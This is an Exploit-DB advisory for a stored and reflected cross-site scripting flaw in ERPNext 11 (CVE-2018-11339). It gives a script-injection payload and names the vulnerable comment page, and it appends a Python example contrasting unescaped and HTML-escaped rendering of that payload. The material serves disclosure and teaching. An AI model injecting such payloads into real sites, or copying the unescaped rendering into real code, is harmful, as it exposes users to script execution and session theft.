ERPnext 11 – Cross-Site Scripting

  • Author: Veerababu Penugonda
    Date: 2018-05-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44691/
  • # Exploit Title: ERPnext 11.x.x - Cross-Site Scripting
    # Date: 2018-05-10
    # Exploit Author: Veerababu Penugonda
    # Vendor Homepage: https://erpnext.com/
    # Software Link: https://demo.erpnext.com/
    # Version: Frappe ERPNext v11.x.x-develop
    # Tested on: Mozilla Firefox Quantum 60.1, Ubuntu OS
    # CVE : CVE-2018-11339
    
    # 1. Description:
    # The page https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015
    # and the “Comment” functionality are vulnerable to XSS: stored,
    # reflected, cookie, and possibly more.
    
    # 2. Payload : 
    
    "><script>alert(1)</script>
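
The following is an added example, not code from the advisory or from ERPNext/Frappe: it renders the payload above through a hypothetical comment template, once without encoding and once with HTML encoding, and parses each result to count the `<script>` elements a browser would see. The template and the function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Payload quoted in the advisory above.
PAYLOAD = '"><script>alert(1)</script>'

# Hypothetical template (assumption, not ERPNext's markup): the comment text
# is echoed once into a quoted attribute and once into element content.
TEMPLATE = '<div class="comment" title="{attr}"><p>{body}</p></div>'


class ScriptCounter(HTMLParser):
    """Counts <script> start tags and records the title of each <div>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.script_tags = 0
        self.titles = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "div":
            self.titles.append(dict(attrs).get("title"))


def render_unsafe(comment):
    # Vulnerable form: raw user input is concatenated into markup.
    return TEMPLATE.format(attr=comment, body=comment)


def render_escaped(comment):
    # Hardened form: encode &, <, > and both quote characters so the input
    # cannot close the attribute or open a new tag.
    safe = html.escape(comment, quote=True)
    return TEMPLATE.format(attr=safe, body=safe)


def inspect(markup):
    """Return (number of <script> elements, list of div title values)."""
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.script_tags, parser.titles


if __name__ == "__main__":
    print("unsafe :", inspect(render_unsafe(PAYLOAD)))
    print("escaped:", inspect(render_escaped(PAYLOAD)))
```

In the unencoded rendering the leading `">` closes the `title` attribute and the tag, so the attribute ends up empty and two script elements appear; in the encoded rendering the whole payload stays inside the attribute value as inert text.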